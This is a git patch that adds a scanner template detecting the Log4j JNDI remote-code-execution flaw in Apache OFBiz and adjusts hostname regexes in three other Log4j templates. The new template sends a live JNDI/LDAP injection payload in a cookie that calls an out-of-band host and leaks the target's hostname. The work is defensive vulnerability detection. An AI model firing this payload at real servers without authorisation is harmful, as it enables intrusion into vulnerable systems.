From 4af3a04b3ce85c9e2c471219b45b856115ec7871 Mon Sep 17 00:00:00 2001
From: Sandeep Singh <sandeep@projectdiscovery.io>
Date: Sat, 18 Dec 2021 15:46:49 +0530
Subject: [PATCH] Apache OFBiz Log4j JNDI RCE (#3374)

* Added Apache OFBiz Log4j JNDI RCE

* fixed matcher to match hostname in both cases
---
 .../apache/apache-ofbiz-log4j-rce.yaml        | 33 +++++++++++++++++++
 .../apache/apache-solr-log4j-rce.yaml         |  4 +--
 .../mobileiron/mobileiron-log4j-jndi-rce.yaml |  4 +--
 .../vmware/vmware-vcenter-log4j-jndi-rce.yaml |  4 +--
 4 files changed, 39 insertions(+), 6 deletions(-)
 create mode 100644 vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml

diff --git a/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
new file mode 100644
index 0000000000..c5937771c0
--- /dev/null
+++ b/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
@@ -0,0 +1,33 @@
+id: apache-ofbiz-log4j-rce
+
+info:
+  name: Apache OFBiz Log4j JNDI RCE
+  author: pdteam
+  severity: critical
+  tags: ofbiz,oast,log4j,rce,apache
+
+requests:
+  - raw:
+      - |
+        GET /webtools/control/main HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+
+    extractors:
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
\ No newline at end of file
diff --git a/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/vulnerabilities/apache/apache-solr-log4j-rce.yaml
index 5f9cb2dd84..19d21efac7 100644
--- a/vulnerabilities/apache/apache-solr-log4j-rce.yaml
+++ b/vulnerabilities/apache/apache-solr-log4j-rce.yaml
@@ -26,11 +26,11 @@ requests:
       - type: regex
         part: interactsh_request
         regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
 
     extractors:
       - type: regex
         part: interactsh_request
         group: 1
         regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
\ No newline at end of file
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
\ No newline at end of file
diff --git a/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
index 70849704af..b66890728d 100644
--- a/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
+++ b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
@@ -31,11 +31,11 @@ requests:
       - type: regex
         part: interactsh_request
         regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
 
     extractors:
       - type: regex
         part: interactsh_request
         group: 1
         regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
\ No newline at end of file
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
\ No newline at end of file
diff --git a/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
index 83d9508245..b231e287be 100644
--- a/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
+++ b/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml
@@ -28,11 +28,11 @@ requests:
       - type: regex
         part: interactsh_request
         regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
 
     extractors:
       - type: regex
         part: interactsh_request
         group: 1
         regex:
-          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
\ No newline at end of file
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
\ No newline at end of file